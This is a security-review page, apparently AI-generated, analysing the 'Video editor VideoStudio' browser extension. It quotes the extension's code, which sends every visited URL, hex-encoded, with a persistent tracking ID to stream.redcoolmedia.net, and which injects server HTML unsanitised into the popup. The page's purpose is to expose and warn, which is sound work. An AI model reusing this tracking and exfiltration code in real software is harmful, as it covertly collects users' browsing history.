Is Video editor VideoStudio safe?
VideoStudio is high risk. Each time you switch tabs or navigate, Video editor VideoStudio sends the full URL to stream.redcoolmedia.net, hex-encoded but trivially reversible, giving the server your history in plain text. Testing confirmed this fires automatically.…
Who publishes itRedcoolMedia - 15 other listings from the same operator, 10 of them carrying a finding
RedcoolMedia - 15 other listings from the same operator, 10 of them carrying a finding
What this publisher told the store about itself, and the other listings that told it the same thing.
Same store account
15 other listings published from this account, 432k+ users between them. 10 of them carry a finding.
Shared hosts - 2 hostnames
Hostnames hardcoded in this extension that few other listings call. That can mean one operator behind both, and it can equally mean a small shared vendor, so it is context rather than a conclusion. Hosts that many listings call are left out: they are services, not connections.
AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.
Publishers can request a review.
Findings
Every URL you visit is automatically transmitted to a remote server
Each time you switch tabs or navigate, Video editor VideoStudio sends the full URL to stream.redcoolmedia.net, hex-encoded but trivially reversible, giving the server your history in plain text.
Testing confirmed this fires automatically.
- Severity
- High unwanted
- Type
- Unexpected
- CWE
- CWE-359
- Source
- Dynamic sandbox
You navigate to any website or switch browser tabs.
This happens continuously throughout normal browsing, no special action required.
The extension immediately sends the full URL to stream.redcoolmedia.net.
The URL is hex-encoded and attached as the 'l' query parameter, paired with your persistent tracking ID in the 'u' parameter.
HTTP 200 OK
The URL is encoded using bin2hex(), a simple ASCII-to-hex conversion where each character becomes two hex digits. This is not encryption; the server receives the full URL in instantly recoverable form.
https://www.google.com/Navigation listeners and transmission logic in web.js
Tab event listeners (web.js lines 20-27)
web.js// Fires on EVERY tab switchchrome.tabs.onActivated.addListener(function(activeInfo) { aati = activeInfo.tabId; sendUrlToServer(aati);});// Fires on EVERY navigationchrome.tabs.onUpdated.addListener(function(tabId, changeInfo, tab) { sendUrlToServer(tabId);});URL capture and transmission
web.jsfunction sendUrlToServer(tabId) { chrome.tabs.get(tabId, function(tab) { // Skips only redcoolmedia.net's own pages if (!tab.url.includes('redco') && tab.url.includes('http') && tab.url !== lastSentUrl) { transmit(tab.url); lastSentUrl = tab.url; } });}// Sends hex-encoded URL + persistent user IDawait fetch('https://stream.redcoolmedia.net/api/videostudiou.php' + '?l=' + bin2hex(url) // hex-encoded URL + '&hex=1' // tells server encoding is in use + '&u=' + userId); // persistent tracking ID- stream.redcoolmedia.net
Receives every visited URL paired with a persistent per-installation tracking ID. Operated by redcoolmedia.net, the extension developer.
Opening the popup sends your tracking ID and returns your browsing history
Each time you open the popup, it queries a server endpoint with your persistent tracking ID and renders the response into the popup: a table of MP4 videos detected across visited pages, confirming a browsing-history database per install.
- Severity
- Medium unwanted
- Type
- Unexpected
- CWE
- CWE-200
- Source
- Dynamic sandbox
You open the extension popup.
No other interaction is required, the request fires immediately on popup load.
The server returns a personalised table of MP4 videos detected across your visited pages.
The response is injected as raw HTML into the popup, rendering your server-stored browsing history directly in your browser.
HTTP 200 OK, 128 bytes of personalised HTML: <tbody id="internetx"><tr><td style='color: #333;'>No mp4 videos in this webpage</td><td>-</td><td>-</td><td>-</td></tr></tbody>
Popup request and DOM injection in apar.js
Server request and DOM injection
apar.js// On every popup open, fetch this user's video history from the server// The 'u' parameter is the persistent per-installation tracking IDvar req = new XMLHttpRequest();req.open('GET', 'https://stream.redcoolmedia.net/api/videostudiob.php?u=' + trackingId, true);req.onload = function() { if (req.readyState === 4 && req.status === 200) { // Server returns HTML containing user's browsing history // Injected directly into the popup DOM without sanitisation document.getElementById('internetx').innerHTML = req.responseText; }};req.send(); // Fires immediately when popup loads- stream.redcoolmedia.net
Stores a per-user database of MP4-containing pages from URL exfil. Returns personalized browsing history as HTML on popup open. Operated by the extension developer.
A persistent tracking ID links all your browsing data to one profile
On first run, the extension generates a random 10-character ID stored permanently.
It's attached to every URL and popup request, linking your browsing into one profile across sessions.
Testing found the same ID in all 6 captured requests.
- Severity
- Medium unwanted
- Type
- Unexpected
- CWE
- CWE-359
- Source
- Dynamic sandbox
You install the extension for the first time.
The ID is generated immediately and permanently stored.
A permanent 10-character tracking ID is assigned to your browser installation.
This ID is sent with every URL upload and every popup request, linking all activity into one persistent profile on the developer's server.
'usernameredcool' is the persistent tracking ID sent with every request. 'redcoolonline' controls URL exfil; it defaults to '1' (enabled).
- Location
- chrome.storage.local key 'redcool_key'
{ "redcool_key": { "redcoolonline": "1", "usernameredcool": "hjywetnmng" }}Tracking ID generation and reuse in web.js
Tracking ID retrieval and generation
web.js// Load persistent tracking ID from local storagelet storageResult = await chrome.storage.local.get(['redcool_key']);let profile = storageResult['redcool_key'] || {};// Reuse existing ID, or generate a new one on first runif (profile.usernameredcool) { trackingId = profile.usernameredcool;} else { // 10-char random alphanumeric: 62^10 ≈ 839 trillion combinations trackingId = randomString(10).toLowerCase(); profile.usernameredcool = trackingId;}// ID is then attached to EVERY request to the server- stream.redcoolmedia.net
Receives the tracking ID as the 'u' parameter on every URL exfil request (/api/videostudiou.php) and every popup database query (/api/videostudiob.php).
+1 more finding not shown
What it can do
Permissions this extension asks for, as declared in version 1.8.7. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.
Store data in your browser
storage
See the address and title of every tab you have open
tabs